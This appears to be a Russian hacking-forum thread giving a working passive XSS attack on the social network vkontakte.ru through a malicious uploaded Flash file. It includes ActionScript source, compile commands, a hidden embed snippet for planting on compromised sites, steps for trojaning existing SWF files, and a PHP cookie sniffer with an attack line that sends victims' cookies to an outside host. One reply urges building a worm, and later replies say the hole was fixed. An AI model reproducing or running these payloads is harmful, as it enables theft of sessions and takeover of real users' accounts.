vkontakte.ru passive xss (swf)

Качаем mtask
Создаём файлик hek.as с содержанием

PHP:

class hek{
  function hek() {
  }

  static function main(mc) {
    getURL("javascript:alert(document.cookie);");
  }
}

Далее компилим

Code:

mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as

В настройках делаем доступным сервис "Приложения", обзываем его как-нить и заливаем наш скомпиленный hek.swf +)
Смотрим созданное "приложение" и выдираем ссылку на swf

PHP:

...
<script type="text/javascript">
//<![CDATA[
var so = new SWFObject('evil_swf_on_vk','player',"1","1",'9');
so.addParam("allowfullscreen","false");
so.addParam("allownetworking", "all");
...

вот собственно и всё) кодес можно любой

Применение:
1) Можно вставить в сорц похэканного сайта кодес

PHP:

<u style="display:none">
<embed src="evil_swf_on_vk" width="1" height="1" type="application/x-shockwave-flash"></embed>
</u>


и кинуть ссылку жертве)

2) Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools
Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump

Code:

swfdump.exe hek.swf

компилим с нужными параметрами злобнокодес (а именно меняем флаг -header)

Code:

mtasc.exe -swf hek.swf -main -header x:y:z hek.as

x и y - размеры, z - частота кадров в секунду
и вживляем

Code:

swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf

Демо с алертом

Ссылки по теме:
http://tech.motion-twin.com/zip/mtasc-1.12.zip
http://www.swftools.org/swftools-0.7.0.exe

 

Фига Тох
+5

 

Авторегер есть, спамилка по id есть, теперь и ксс есть. Хуярьте товарищи червя...

 

Или я непохеккер или оно не работает. Алерты все на ура, но при добавлении конструкций типа:

Code:

javascript:eval(String.fromCharCode(bla-bla-bla))

выплёвывает содержимое bla-bla-bla, где bla-bla-bla - енто закодированная хрень:

Code:

img=new Image(); img.src="http://гаткей_снеффер.gif?"+document.cookie;

 

Ха....ништяк, молодец

 

sniffer.php

PHP:

<?
$ref = $_SERVER['HTTP_REFERER'];
$infa = $_SERVER['REMOTE_ADDR'];
$infa .= " : ";
$infa .= $_GET['s'];
$infa .= "\r\n\r\n";
$f=fopen("log.txt","a+");
fputs($f,$infa);
fclose($f);
Header("Location: http://www.vkontakte.ru"); //.$ref);
?>

attack.swf

PHP:

getURL("javascript:location.href=\"http://yourhost/sniffer.php?s=\"+document.cookie;");

 

Может я не фтыкнул чет, но...когда вручную заходишь на демку
то куки норм, а если через сайт подставной...т.е. кодом, то приходит

Code:

__utma=52566834.124252957.1203944691.1203944691.1206562305.2;%20__utmz=52566834.1203944691.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);%20__utmb=52566834;%20__utmc=52566834;%20jcpu=1;%20pcnt=4;%20pcls=1

 

Все очень просто. Если вы делаете embed то получаете куки своего сайта. А если делать iframe то будут куки vkontakte

 

Swf у меня не вызывается через ифрейм

 

гм у меня на опере вызывается

 

Проверил, только опера уважает ифрейм, остальные так не хотят
=

 

ну значит надо сделать красивую флешку и давать ссылку на нее

 

Так тоже не получиться, потому что заголовок не дает прогрузиться, Тохег объяснил где и как ты её испытывал?

 

Эм... перепроверьте..
Фикс или я криворукий?
ПРи первом переходе на свой свф показываются иероглифы...дальше уже 404

 

Фикс, буквально на 2-ой день. Свф с вредным кодом удаляется сразу

 

этож п*ц какая идс-ка там наверно стоит )

 

Имхо в идске есть баги и можно как-то криптануть наш код.......

 

Спустил в связи с https://forum.antichat.ru/threadedpost718472.html

 

не актуально, заметил, что у каждого пользователя своя ссылка на флэшку

 

Обьясните пожалуйста как и что компилить, если можно по подробней.